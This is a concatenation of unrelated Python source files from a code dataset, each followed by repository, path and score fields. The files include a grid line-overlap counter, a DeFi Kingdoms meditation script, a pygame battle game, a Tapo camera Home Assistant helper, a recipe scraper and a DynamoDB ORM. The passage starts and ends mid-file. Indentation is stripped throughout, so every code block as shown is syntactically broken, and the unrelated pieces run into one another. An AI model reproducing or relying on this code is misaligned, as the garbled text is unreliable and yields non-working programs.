x1, y1 = p1.split(',')
x1 = int(x1)
y1 = int(y1)
p2 = p2[1:]
x2, y2 = p2.split(',')
x2 = int(x2)
y2 = int(y2)
if x1 == x2:
dx = 0
elif x1 > x2:
dx = -1
else:
dx = 1
if y1 == y2:
dy = 0
elif y1 > y2:
dy = -1
else:
dy = 1
x = x1
y = y1
while True:
pt = (x, y)
counts[pt] = counts.get(pt, 0) + 1
if x == x2 and y == y2:
break
x += dx
y += dy
n = 0
for _, ct in counts.items():
if ct > 1:
n += 1
print(n) | 3.140625 | 3 |
meditation_example.py | sodapopinsky/dfk | 90 | 5039 | import logging
from web3 import Web3
import sys
import time
import meditation.meditation as meditation
if __name__ == "__main__":
log_format = '%(asctime)s|%(name)s|%(levelname)s: %(message)s'
logger = logging.getLogger("DFK-meditation")
logger.setLevel(logging.DEBUG)
logging.basicConfig(level=logging.INFO, format=log_format, stream=sys.stdout)
rpc_server = 'https://api.harmony.one'
logger.info("Using RPC server " + rpc_server)
private_key = None # set private key
account_address = '0x2E7669F61eA77F02445A015FBdcFe2DE47083E02'
gas_price_gwei = 10
tx_timeout_seconds = 30
w3 = Web3(Web3.HTTPProvider(rpc_server))
active_meditations = meditation.get_active_meditations(account_address, rpc_server)
logger.info("Pending meditation on address " + str(account_address) + ": "+str(active_meditations))
level = 1
hero_id = 1
required_runes = meditation.get_required_runes(level, rpc_server)
meditation.start_meditation(1, meditation.stat2id('strength'), meditation.stat2id('endurance'), meditation.stat2id('luck'),
meditation.ZERO_ADDRESS, private_key, w3.eth.getTransactionCount(account_address),
gas_price_gwei, tx_timeout_seconds, rpc_server, logger)
hero_meditation = meditation.get_hero_meditation(hero_id, rpc_server)
logger.info("Pending meditation "+str(hero_meditation))
time.sleep(5)
meditation.complete_meditation(hero_id, private_key, w3.eth.getTransactionCount(account_address),
gas_price_gwei, tx_timeout_seconds, rpc_server, logger)
| 2.03125 | 2 |
python/johnstarich/interval.py | JohnStarich/dotfiles | 3 | 5040 | <reponame>JohnStarich/dotfiles
import time
class Interval(object):
def __init__(self, delay_time: int):
self.delay_time = delay_time
self.current_time = 0
@staticmethod
def now():
return time.gmtime().tm_sec
def should_run(self) -> bool:
if self.current_time == 0:
self.current_time = Interval.now()
return True
return self.is_done()
def is_done(self) -> bool:
timestamp = Interval.now()
return self.current_time + self.delay_time < timestamp or \
self.current_time > timestamp
def start(self) -> int:
self.current_time = Interval.now()
return self.current_time
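# Hedged usage sketch (illustrative): poll should_run() in a loop and call
# start() whenever the periodic work is actually performed.
#
#     interval = Interval(delay_time=10)
#     if interval.should_run():
#         interval.start()
#         # ... do the periodic work ...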
| 3.125 | 3 |
servers/python/coweb/bot/wrapper/object.py | opencoweb/coweb | 83 | 5041 | <filename>servers/python/coweb/bot/wrapper/object.py
'''
Copyright (c) The Dojo Foundation 2011. All Rights Reserved.
Copyright (c) IBM Corporation 2008, 2011. All Rights Reserved.
'''
# tornado
import tornado.ioloop
# std lib
import logging
import time
import weakref
import functools
# coweb
from .base import BotWrapperBase
log = logging.getLogger('coweb.bot')
class ObjectBotWrapper(BotWrapperBase):
def __init__(self, manager, botClass, serviceName, serviceToken, appData):
self.serviceName = serviceName
self.appData = appData
self._serviceToken = serviceToken
self._manager = weakref.proxy(manager)
self._bot = botClass(self, serviceName, appData)
self._ioLoop = tornado.ioloop.IOLoop.instance()
# asynchronously inform local manager we're ready
self.add_callback(self._manager.on_bot_ready,
serviceName, serviceToken, self)
def on_message(self, mtdName, *args):
'''Proxy messages from manager to bot impl.'''
try:
mtd = getattr(self._bot, mtdName)
except AttributeError:
# bot isn't listening for this message type
return
# keep sync with manager so we can catch exceptions, else exception
# fires in context of original request which is wrong, it's a bot
# error not a client error
try:
mtd(*args)
except Exception:
log.exception('bot error')
def reply(self, replyToken, data):
'''Sends a private reply to a requestor.'''
self._manager.on_bot_response(self.serviceName, replyToken, data)
def publish(self, data):
'''Sends a public reply to subscribes on a bot subchannel.'''
self._manager.on_bot_publish(self.serviceName, data)
def add_callback(self, callback, *args, **kwargs):
'''Schedule a callback in the main loop.'''
f = functools.partial(callback, *args, **kwargs)
self._ioLoop.add_callback(f)
def add_timer(self, delay, callback, *args, **kwargs):
'''Add a one-shot timer that schedules a main loop callback.'''
f = functools.partial(callback, *args, **kwargs)
return self._ioLoop.add_timeout(time.time() + delay, f)
def remove_timer(self, timer):
'''Remove a one-shot timer.'''
self._ioLoop.remove_timeout(timer)
| 1.648438 | 2 |
battle_tut5.py | lankotiAditya/RPG_battle_main | 22 | 5042 | import pygame
import random
pygame.init()
clock = pygame.time.Clock()
fps = 60
#game window
bottom_panel = 150
screen_width = 800
screen_height = 400 + bottom_panel
screen = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption('Battle')
#define game variables
current_fighter = 1
total_fighters = 3
action_cooldown = 0
action_wait_time = 90
attack = False
potion = False
clicked = False
#define fonts
font = pygame.font.SysFont('Times New Roman', 26)
#define colours
red = (255, 0, 0)
green = (0, 255, 0)
#load images
#background image
background_img = pygame.image.load('img/Background/background.png').convert_alpha()
#panel image
panel_img = pygame.image.load('img/Icons/panel.png').convert_alpha()
#sword image
sword_img = pygame.image.load('img/Icons/sword.png').convert_alpha()
#create function for drawing text
def draw_text(text, font, text_col, x, y):
img = font.render(text, True, text_col)
screen.blit(img, (x, y))
#function for drawing background
def draw_bg():
screen.blit(background_img, (0, 0))
#function for drawing panel
def draw_panel():
#draw panel rectangle
screen.blit(panel_img, (0, screen_height - bottom_panel))
#show knight stats
draw_text(f'{knight.name} HP: {knight.hp}', font, red, 100, screen_height - bottom_panel + 10)
for count, i in enumerate(bandit_list):
#show name and health
draw_text(f'{i.name} HP: {i.hp}', font, red, 550, (screen_height - bottom_panel + 10) + count * 60)
#fighter class
class Fighter():
def __init__(self, x, y, name, max_hp, strength, potions):
self.name = name
self.max_hp = max_hp
self.hp = max_hp
self.strength = strength
self.start_potions = potions
self.potions = potions
self.alive = True
self.animation_list = []
self.frame_index = 0
self.action = 0#0:idle, 1:attack, 2:hurt, 3:dead
self.update_time = pygame.time.get_ticks()
#load idle images
temp_list = []
for i in range(8):
img = pygame.image.load(f'img/{self.name}/Idle/{i}.png')
img = pygame.transform.scale(img, (img.get_width() * 3, img.get_height() * 3))
temp_list.append(img)
self.animation_list.append(temp_list)
#load attack images
temp_list = []
for i in range(8):
img = pygame.image.load(f'img/{self.name}/Attack/{i}.png')
img = pygame.transform.scale(img, (img.get_width() * 3, img.get_height() * 3))
temp_list.append(img)
self.animation_list.append(temp_list)
self.image = self.animation_list[self.action][self.frame_index]
self.rect = self.image.get_rect()
self.rect.center = (x, y)
def update(self):
animation_cooldown = 100
#handle animation
#update image
self.image = self.animation_list[self.action][self.frame_index]
#check if enough time has passed since the last update
if pygame.time.get_ticks() - self.update_time > animation_cooldown:
self.update_time = pygame.time.get_ticks()
self.frame_index += 1
#if the animation has run out then reset back to the start
if self.frame_index >= len(self.animation_list[self.action]):
self.idle()
def idle(self):
#set variables to attack animation
self.action = 0
self.frame_index = 0
self.update_time = pygame.time.get_ticks()
def attack(self, target):
#deal damage to enemy
rand = random.randint(-5, 5)
damage = self.strength + rand
target.hp -= damage
#check if target has died
if target.hp < 1:
target.hp = 0
target.alive = False
#set variables to attack animation
self.action = 1
self.frame_index = 0
self.update_time = pygame.time.get_ticks()
def draw(self):
screen.blit(self.image, self.rect)
class HealthBar():
def __init__(self, x, y, hp, max_hp):
self.x = x
self.y = y
self.hp = hp
self.max_hp = max_hp
def draw(self, hp):
#update with new health
self.hp = hp
#calculate health ratio
ratio = self.hp / self.max_hp
pygame.draw.rect(screen, red, (self.x, self.y, 150, 20))
pygame.draw.rect(screen, green, (self.x, self.y, 150 * ratio, 20))
knight = Fighter(200, 260, 'Knight', 30, 10, 3)
bandit1 = Fighter(550, 270, 'Bandit', 20, 6, 1)
bandit2 = Fighter(700, 270, 'Bandit', 20, 6, 1)
bandit_list = []
bandit_list.append(bandit1)
bandit_list.append(bandit2)
knight_health_bar = HealthBar(100, screen_height - bottom_panel + 40, knight.hp, knight.max_hp)
bandit1_health_bar = HealthBar(550, screen_height - bottom_panel + 40, bandit1.hp, bandit1.max_hp)
bandit2_health_bar = HealthBar(550, screen_height - bottom_panel + 100, bandit2.hp, bandit2.max_hp)
run = True
while run:
clock.tick(fps)
#draw background
draw_bg()
#draw panel
draw_panel()
knight_health_bar.draw(knight.hp)
bandit1_health_bar.draw(bandit1.hp)
bandit2_health_bar.draw(bandit2.hp)
#draw fighters
knight.update()
knight.draw()
for bandit in bandit_list:
bandit.update()
bandit.draw()
#control player actions
#reset action variables
attack = False
potion = False
target = None
#make sure mouse is visible
pygame.mouse.set_visible(True)
pos = pygame.mouse.get_pos()
for count, bandit in enumerate(bandit_list):
if bandit.rect.collidepoint(pos):
#hide mouse
pygame.mouse.set_visible(False)
#show sword in place of mouse cursor
screen.blit(sword_img, pos)
if clicked == True:
attack = True
target = bandit_list[count]
#player action
if knight.alive == True:
if current_fighter == 1:
action_cooldown += 1
if action_cooldown >= action_wait_time:
#look for player action
#attack
if attack == True and target != None:
knight.attack(target)
current_fighter += 1
action_cooldown = 0
#enemy action
for count, bandit in enumerate(bandit_list):
if current_fighter == 2 + count:
if bandit.alive == True:
action_cooldown += 1
if action_cooldown >= action_wait_time:
#attack
bandit.attack(knight)
current_fighter += 1
action_cooldown = 0
else:
current_fighter += 1
#if all fighters have had a turn then reset
if current_fighter > total_fighters:
current_fighter = 1
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
if event.type == pygame.MOUSEBUTTONDOWN:
clicked = True
else:
clicked = False
pygame.display.update()
pygame.quit()
| 3.265625 | 3 |
curso_em_video/0087a.py | marinaoliveira96/python-exercises | 0 | 5043 | <reponame>marinaoliveira96/python-exercises
matriz = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
soma = col3 = maior = 0
for l in range(0, 3):
for c in range(0, 3):
matriz[l][c] = int(input(f'[{l}][{c}]: '))
for l in range(0, 3):
for c in range(0, 3):
print(f'[{matriz[l][c]:^5}]', end='')
if matriz[l][c] % 2 == 0:
soma += matriz[l][c]
print()
for l in range(0, 3):
col3 += matriz[l][2]
for c in range(0, 3):
if c == 0:
maior = matriz[1][c]
elif matriz[1][c] > maior:
maior = matriz[1][c]
print(f'The sum of the even numbers is {soma}')
print(f'The sum of the values in the 3rd column is {col3}')
print(f'The largest number in the 2nd row is {maior}') | 4.09375 | 4 |
custom_components/tapo_control/utils.py | david-kalbermatten/HomeAssistant-Tapo-Control | 0 | 5044 | <gh_stars>0
import onvif
import os
import asyncio
import urllib.parse
from onvif import ONVIFCamera
from pytapo import Tapo
from .const import ENABLE_MOTION_SENSOR, DOMAIN, LOGGER, CLOUD_PASSWORD
from homeassistant.const import CONF_IP_ADDRESS, CONF_USERNAME, CONF_PASSWORD
from homeassistant.components.onvif.event import EventManager
from homeassistant.components.ffmpeg import DATA_FFMPEG
from haffmpeg.tools import IMAGE_JPEG, ImageFrame
def registerController(host, username, password):
return Tapo(host, username, password)
async def isRtspStreamWorking(hass, host, username, password):
_ffmpeg = hass.data[DATA_FFMPEG]
ffmpeg = ImageFrame(_ffmpeg.binary, loop=hass.loop)
username = urllib.parse.quote_plus(username)
    password = urllib.parse.quote_plus(password)
streaming_url = f"rtsp://{username}:{password}@{host}:554/stream1"
image = await asyncio.shield(
ffmpeg.get_image(
streaming_url,
output_format=IMAGE_JPEG,
)
)
return not image == b""
async def initOnvifEvents(hass, host, username, password):
device = ONVIFCamera(
host,
2020,
username,
password,
f"{os.path.dirname(onvif.__file__)}/wsdl/",
no_cache=True,
)
try:
await device.update_xaddrs()
device_mgmt = device.create_devicemgmt_service()
device_info = await device_mgmt.GetDeviceInformation()
if "Manufacturer" not in device_info:
raise Exception("Onvif connection has failed.")
return device
except Exception:
pass
return False
async def getCamData(hass, controller):
camData = {}
presets = await hass.async_add_executor_job(controller.isSupportingPresets)
camData["user"] = controller.user
camData["basic_info"] = await hass.async_add_executor_job(controller.getBasicInfo)
camData["basic_info"] = camData["basic_info"]["device_info"]["basic_info"]
try:
motionDetectionData = await hass.async_add_executor_job(
controller.getMotionDetection
)
motion_detection_enabled = motionDetectionData["enabled"]
if motionDetectionData["digital_sensitivity"] == "20":
motion_detection_sensitivity = "low"
elif motionDetectionData["digital_sensitivity"] == "50":
motion_detection_sensitivity = "normal"
elif motionDetectionData["digital_sensitivity"] == "80":
motion_detection_sensitivity = "high"
else:
motion_detection_sensitivity = None
except Exception:
motion_detection_enabled = None
motion_detection_sensitivity = None
camData["motion_detection_enabled"] = motion_detection_enabled
camData["motion_detection_sensitivity"] = motion_detection_sensitivity
try:
privacy_mode = await hass.async_add_executor_job(controller.getPrivacyMode)
privacy_mode = privacy_mode["enabled"]
except Exception:
privacy_mode = None
camData["privacy_mode"] = privacy_mode
try:
alarmData = await hass.async_add_executor_job(controller.getAlarm)
alarm = alarmData["enabled"]
alarm_mode = alarmData["alarm_mode"]
except Exception:
alarm = None
alarm_mode = None
camData["alarm"] = alarm
camData["alarm_mode"] = alarm_mode
try:
commonImageData = await hass.async_add_executor_job(controller.getCommonImage)
day_night_mode = commonImageData["image"]["common"]["inf_type"]
except Exception:
day_night_mode = None
camData["day_night_mode"] = day_night_mode
try:
led = await hass.async_add_executor_job(controller.getLED)
led = led["enabled"]
except Exception:
led = None
camData["led"] = led
try:
auto_track = await hass.async_add_executor_job(controller.getAutoTrackTarget)
auto_track = auto_track["enabled"]
except Exception:
auto_track = None
camData["auto_track"] = auto_track
if presets:
camData["presets"] = presets
else:
camData["presets"] = {}
return camData
async def update_listener(hass, entry):
"""Handle options update."""
host = entry.data.get(CONF_IP_ADDRESS)
username = entry.data.get(CONF_USERNAME)
password = entry.data.get(CONF_PASSWORD)
motionSensor = entry.data.get(ENABLE_MOTION_SENSOR)
cloud_password = entry.data.get(CLOUD_PASSWORD)
try:
if cloud_password != "":
tapoController = await hass.async_add_executor_job(
registerController, host, "admin", cloud_password
)
else:
tapoController = await hass.async_add_executor_job(
registerController, host, username, password
)
hass.data[DOMAIN][entry.entry_id]["controller"] = tapoController
except Exception:
LOGGER.error(
"Authentication to Tapo camera failed."
+ " Please restart the camera and try again."
)
for entity in hass.data[DOMAIN][entry.entry_id]["entities"]:
entity._host = host
entity._username = username
entity._password = password
if hass.data[DOMAIN][entry.entry_id]["events"]:
await hass.data[DOMAIN][entry.entry_id]["events"].async_stop()
if hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]:
await hass.config_entries.async_forward_entry_unload(entry, "binary_sensor")
hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = False
if motionSensor:
await setupOnvif(hass, entry, host, username, password)
async def setupOnvif(hass, entry, host, username, password):
hass.data[DOMAIN][entry.entry_id]["eventsDevice"] = await initOnvifEvents(
hass, host, username, password
)
if hass.data[DOMAIN][entry.entry_id]["eventsDevice"]:
hass.data[DOMAIN][entry.entry_id]["events"] = EventManager(
hass,
hass.data[DOMAIN][entry.entry_id]["eventsDevice"],
f"{entry.entry_id}_tapo_events",
)
hass.data[DOMAIN][entry.entry_id]["eventsSetup"] = await setupEvents(
hass, entry
)
async def setupEvents(hass, entry):
if not hass.data[DOMAIN][entry.entry_id]["events"].started:
events = hass.data[DOMAIN][entry.entry_id]["events"]
if await events.async_start():
if not hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]:
hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = True
hass.async_create_task(
hass.config_entries.async_forward_entry_setup(
entry, "binary_sensor"
)
)
return True
else:
return False
| 2.203125 | 2 |
camd3/infrastructure/component/tests/test_uidattr.py | mamrhein/CAmD3 | 0 | 5045 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Name: test_uidattr
# Purpose: Test driver for module 'uidattr'
#
# Author: <NAME> (<EMAIL>)
#
# Copyright: (c) 2018 <NAME>
# ----------------------------------------------------------------------------
# $Source$
# $Revision$
"""Test driver for module 'uidattr'"""
import unittest
from uuid import uuid1
from camd3.infrastructure.component import (
Component, register_utility, UniqueIdAttribute)
from camd3.infrastructure.component.idfactories import (
UUIDGenerator, uuid_generator)
# factory for UUIDs
def custom_uuid_generator() -> UUIDGenerator: # noqa: D103
while True:
yield uuid1()
class ExplID(Component):
id = UniqueIdAttribute(uid_gen=custom_uuid_generator())
def __init__(self):
self.__class__.id.set_once(self)
class ImplID(Component):
id = UniqueIdAttribute()
def __init__(self):
self.__class__.id.set_once(self)
class UniqueIdAttributeTest(unittest.TestCase):
def setUp(self):
register_utility(uuid_generator(), UUIDGenerator)
self.cid = ImplID()
def test_init(self):
cid = ImplID()
self.assertIsNotNone(cid.id)
self.assertIsNotNone(cid._id)
def test_uniqueness(self):
ids = {self.cid.id}
for i in range(10):
cid = ExplID()
self.assertNotIn(cid.id, ids)
ids.add(cid.id)
if __name__ == '__main__': # pragma: no cover
unittest.main()
| 2.234375 | 2 |
s.py | tn012604409/HW3_chatRobot | 0 | 5046 | <gh_stars>0
import requests
import time
from bs4 import BeautifulSoup
def get_web_page(url):
resp = requests.get(
url=url,
)
if resp.status_code != 200:
print('Invalid url:', resp.url)
return None
else:
return resp.text
def get_articles(dom):
soup = BeautifulSoup(dom, 'html.parser')
tag = soup.find_all('a','recipe-name')
articles=tag
return articles
def run():
page = get_web_page('https://icook.tw/recipes/popular?ref=icook-footer')
if page:
current_articles = get_articles(page)
i=1
s=''
for post in current_articles:
temp=str(post)
num=int(temp.find("\" href="))
#print('The Number {0}: {1}'.format(i, temp[35:num]))
s=s+'The Number {0}: {1}\n'.format(i, temp[35:num])
i=i+1
return s
| 2.921875 | 3 |
awstin/dynamodb/orm.py | k2bd/awstin | 1 | 5047 | <reponame>k2bd/awstin
import uuid
from abc import ABC, abstractmethod
from collections import defaultdict
from typing import Union
from boto3.dynamodb.conditions import Attr as BotoAttr
from boto3.dynamodb.conditions import Key as BotoKey
from awstin.dynamodb.utils import from_decimal, to_decimal
class NotSet:
"""
A value of an attribute on a data model is not present in a DynamoDB result
"""
def __str__(self):
return "<<Attribute not set>>"
def __repr__(self):
return "<<Attribute not set>>"
NOT_SET = NotSet()
class BaseAttribute:
def __init__(self, attribute_name: Union[str, None] = None):
"""
Parameters
----------
attribute_name : str, optional
Name of the property in the DynamoDB table. Defaults to the name of
the attribute on the DynamoModel class.
"""
# Set by user
self._attribute_name = attribute_name
# Set by Model
self._name_on_model = None
@property
def _awstin_name(self):
if self._attribute_name is not None:
return self._attribute_name
else:
return self._name_on_model
def __getattr__(self, name):
"""
Support for nested mapping queries
"""
try:
return super().__getattr__(name)
except AttributeError:
return type(self)(attribute_name=f"{self._awstin_name}.{name}")
def __getitem__(self, index):
"""
Support for nested container queries
"""
return type(self)(attribute_name=f"{self._awstin_name}[{index}]")
# --- Query and scan filter expressions ---
def begins_with(self, value):
"""
Filter results by a key or attribute beginning with a value
Parameters
----------
value : str
Starting string for returned results
"""
return self._query_type(self._awstin_name).begins_with(to_decimal(value))
def between(self, low, high):
"""
Filter results by range (inclusive)
Parameters
----------
low : Any
Low end of the range
high : Any
High end of the range
"""
return self._query_type(self._awstin_name).between(
to_decimal(low),
to_decimal(high),
)
def __eq__(self, value):
return self._query_type(self._awstin_name).eq(to_decimal(value))
def __gt__(self, value):
return self._query_type(self._awstin_name).gt(to_decimal(value))
def __ge__(self, value):
return self._query_type(self._awstin_name).gte(to_decimal(value))
def __lt__(self, value):
return self._query_type(self._awstin_name).lt(to_decimal(value))
def __le__(self, value):
return self._query_type(self._awstin_name).lte(to_decimal(value))
def attribute_type(self, value):
"""
Filter results by attribute type
Parameters
----------
value : str
Index for a DynamoDB attribute type (e.g. "N" for Number)
"""
return BotoAttr(self._awstin_name).attribute_type(to_decimal(value))
def contains(self, value):
"""
Filter results by attributes that are containers and contain the target
value
Parameters
----------
        value : Any
Result must contain this item
"""
return BotoAttr(self._awstin_name).contains(to_decimal(value))
def exists(self):
"""
Filter results by existence of an attribute
"""
return BotoAttr(self._awstin_name).exists()
def in_(self, values):
"""
Filter results by existence in a set
Parameters
----------
values : list of Any
Allowed values of returned results
"""
in_values = [to_decimal(value) for value in values]
return BotoAttr(self._awstin_name).is_in(in_values)
def __ne__(self, value):
return BotoAttr(self._awstin_name).ne(to_decimal(value))
def not_exists(self):
"""
Filter results by non-existence of an attribute
"""
return BotoAttr(self._awstin_name).not_exists()
def size(self):
"""
Filter by size of a collection
"""
return Size(self._awstin_name)
# --- Update expressions ---
def set(self, expression):
"""
Set an attribute to a new value.
Corresponds to SET as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
New value, or an expression defining a new value
"""
return SetOperator(self, UpdateOperand(expression))
def remove(self):
"""
Remove an attribute.
Corresponds to REMOVE as part of the update expression in
``Table.update_item``.
"""
return RemoveOperator(self)
def add(self, expression):
"""
Add to an attribute (numerical add or addition to a set).
Corresponds to ADD as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
Value to add
"""
return AddOperator(self, UpdateOperand(expression))
def delete(self, expression):
"""
Delete part of a set attribute.
Corresponds to DELETE as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
Value to delete
"""
return DeleteOperator(self, UpdateOperand(expression))
def __add__(self, other):
return CombineOperand(UpdateOperand(self), UpdateOperand(other), "+")
def __sub__(self, other):
return CombineOperand(UpdateOperand(self), UpdateOperand(other), "-")
def __radd__(self, other):
return CombineOperand(UpdateOperand(other), UpdateOperand(self), "+")
def __rsub__(self, other):
return CombineOperand(UpdateOperand(other), UpdateOperand(self), "-")
def if_not_exists(self, value):
"""
Conditionally return a value if this attribute doesn't exist on the
model
"""
return IfNotExistsOperand(UpdateOperand(self), UpdateOperand(value))
class Key(BaseAttribute):
"""
Used to define and query hash and sort key attributes on a dynamodb table
data model
"""
_query_type = BotoKey
class Attr(BaseAttribute):
"""
Used to define and query non-key attributes on a dynamodb table data model
"""
_query_type = BotoAttr
def size_query(self, *args, **kwargs):
return BotoAttr(self._awstin_name).size()
class Size(BaseAttribute):
_query_type = size_query
class DynamoModelMeta(type):
def __getattribute__(self, name):
attr = super().__getattribute__(name)
if isinstance(attr, BaseAttribute):
attr._name_on_model = name
return attr
else:
return attr
def _dynamodb_attributes(self):
result = {
getattr(self, attr)._awstin_name: attr
for attr in dir(self)
if isinstance(getattr(self, attr), BaseAttribute)
}
return result
def _get_kwargs(self):
"""
Kwargs that should be passed to query, scan, get_item
"""
return {
**self._dynamo_projection(),
**self._index_kwargs(),
}
def _dynamo_projection(self):
"""
Attributes to request when retrieving data from DynamoDB
Returns
-------
dict
kwargs to be passed to DynamoDB get attribute calls to employ
a projection expression and placeholders
"""
placeholders = {
"#" + str(uuid.uuid4())[:8]: value
for value in self._dynamodb_attributes().keys()
}
expression = ", ".join(placeholders.keys())
return dict(
ProjectionExpression=expression,
ExpressionAttributeNames=placeholders,
)
def _index_kwargs(self):
if hasattr(self, "_index_name_"):
return dict(
IndexName=self._index_name_,
)
else:
return {}
class DynamoModel(metaclass=DynamoModelMeta):
"""
Class defining an ORM model for a DynamoDB table.
Subclasses must have a ``_table_name_`` attribute. Attributes making up
the data model should be Attr or Key instances.
Subclasses representing indexes should also have an ``_index_name_``
attribute
"""
def __init__(self, **kwargs):
"""
Parameters
----------
**kwargs : dict of (str, Any)
Initialization of Attr and Key attributes.
"""
model_attrs = type(self)._dynamodb_attributes().values()
for name in model_attrs:
setattr(self, name, NOT_SET)
for name, value in kwargs.items():
if name not in model_attrs:
msg = f"{type(self)!r} has no attribute {name!r}"
raise AttributeError(msg)
setattr(self, name, value)
@classmethod
def deserialize(cls, data):
"""
Deserialize JSON into a DynamoModel subclass. Internally converts
Decimal to float in the deserialization.
Parameters
----------
data : dict of (str, Any)
Serialized model
Returns
-------
DynamoModel
The deserialized data model
"""
model_attrs = cls._dynamodb_attributes()
result = cls()
for attr in model_attrs.values():
setattr(result, attr, NOT_SET)
for db_attr, value in data.items():
if db_attr in model_attrs.keys():
if type(value) in [list, set, tuple]:
value = type(value)(from_decimal(v) for v in value)
elif type(value) is dict:
value = {from_decimal(k): from_decimal(v) for k, v in value.items()}
else:
value = from_decimal(value)
setattr(result, model_attrs[db_attr], value)
return result
def serialize(self):
"""
Serialize a DynamoModel subclass to JSON that can be inserted into
DynamoDB. Internally converts float to Decimal.
Returns
-------
dict of (str, Any)
The serialized JSON entry
"""
model_attrs = type(self)._dynamodb_attributes()
result = {}
for dynamo_name, model_name in model_attrs.items():
value = getattr(self, model_name)
if value is not NOT_SET:
if type(value) in [list, set, tuple]:
value = type(value)(to_decimal(v) for v in value)
elif type(value) is dict:
value = {to_decimal(k): to_decimal(v) for k, v in value.items()}
else:
value = to_decimal(value)
result[dynamo_name] = value
return result
# ---- Update Operators
class UpdateOperator(ABC):
"""
A representation of an UpdateItem expression
"""
def __and__(self, other):
"""
Combine two update expressions
"""
return CombineOperator(self, other)
@abstractmethod
def update_dict(self):
pass
@staticmethod
def update_expression(update_dict):
expressions = []
for operation in "SET", "ADD", "DELETE", "REMOVE":
if update_dict.get(operation):
expressions.append(operation + " " + ", ".join(update_dict[operation]))
return " ".join(expressions)
def serialize(self):
"""
Produce kwargs to be passed to DynamoDB Table.update_item.
Keys and values are:
"UpdateExpression": string representing the update expression
"ExpressionAttributeNames": Placeholder map for attribute names
"ExpressionAttributeValues": Placeholder map for attribute values
Returns
-------
dict
Kwargs for update_item
"""
update_dict = self.update_dict()
result = {
"UpdateExpression": self.update_expression(update_dict),
}
if update_dict["ExpressionAttributeNames"]:
result["ExpressionAttributeNames"] = update_dict["ExpressionAttributeNames"]
if update_dict["ExpressionAttributeValues"]:
result["ExpressionAttributeValues"] = update_dict[
"ExpressionAttributeValues"
]
return result
class CombineOperator(UpdateOperator):
"""
Combine two update expressions
"""
def __init__(self, left, right):
self.left = left
self.right = right
def update_dict(self):
result = defaultdict(list)
ser_left = self.left.update_dict()
ser_right = self.right.update_dict()
items = list(ser_left.items()) + list(ser_right.items())
for key, values in items:
if key in ["SET", "ADD", "DELETE", "REMOVE"]:
result[key].extend(values)
result["ExpressionAttributeNames"] = dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
)
result["ExpressionAttributeValues"] = dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
)
return result
class SetOperator(UpdateOperator):
"""
Support for SET
"""
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"SET": [
f"{serialized_attr['UpdateExpression']} = "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
class AddOperator(UpdateOperator):
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"ADD": [
f"{serialized_attr['UpdateExpression']} "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
class RemoveOperator(UpdateOperator):
def __init__(self, attr):
self.attr = attr
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
return {
"REMOVE": [serialized_attr["UpdateExpression"]],
"ExpressionAttributeNames": serialized_attr["ExpressionAttributeNames"],
"ExpressionAttributeValues": {},
}
class DeleteOperator(UpdateOperator):
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"DELETE": [
f"{serialized_attr['UpdateExpression']} "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
# ---- Update Operands
def serialize_operand(value):
name = str(uuid.uuid4())[:8]
if isinstance(value, UpdateOperand):
return value.serialize()
elif isinstance(value, BaseAttribute):
return itemize_attr(value)
elif type(value) in [list, set, tuple]:
name = ":" + name
value = type(value)([to_decimal(v) for v in value])
return {
"UpdateExpression": name,
"ExpressionAttributeNames": {},
"ExpressionAttributeValues": {name: value},
}
else:
name = ":" + name
return {
"UpdateExpression": name,
"ExpressionAttributeNames": {},
"ExpressionAttributeValues": {name: to_decimal(value)},
}
def itemize_attr(attr):
# Separate indexes
parts = []
current_section = ""
for letter in attr._awstin_name:
if letter == "[":
parts.append(current_section)
current_section = "["
elif letter == "]":
parts.append(current_section + "]")
current_section = ""
else:
current_section += letter
if current_section:
parts.append(current_section)
serialized = ""
name_map = {}
# Separate attributes
for part in parts:
if "[" in part and "]" in part:
serialized += part
else:
if part.startswith("."):
serialized += "."
part = part[1:]
sections = part.split(".")
serialized_sections = []
for section in sections:
name = "#" + str(uuid.uuid4())[:8]
name_map[name] = section
serialized_sections.append(name)
serialized += ".".join(serialized_sections)
result = {
"UpdateExpression": serialized,
"ExpressionAttributeNames": name_map,
"ExpressionAttributeValues": {},
}
return result
class UpdateOperand:
"""
Inner part of an update expression
"""
def __init__(self, value):
self.value = value
def serialize(self):
return serialize_operand(self.value)
class CombineOperand(UpdateOperand):
"""
    Add or subtract two expressions
"""
def __init__(self, left, right, symbol):
self.left = left
self.right = right
self.symbol = symbol
def serialize(self):
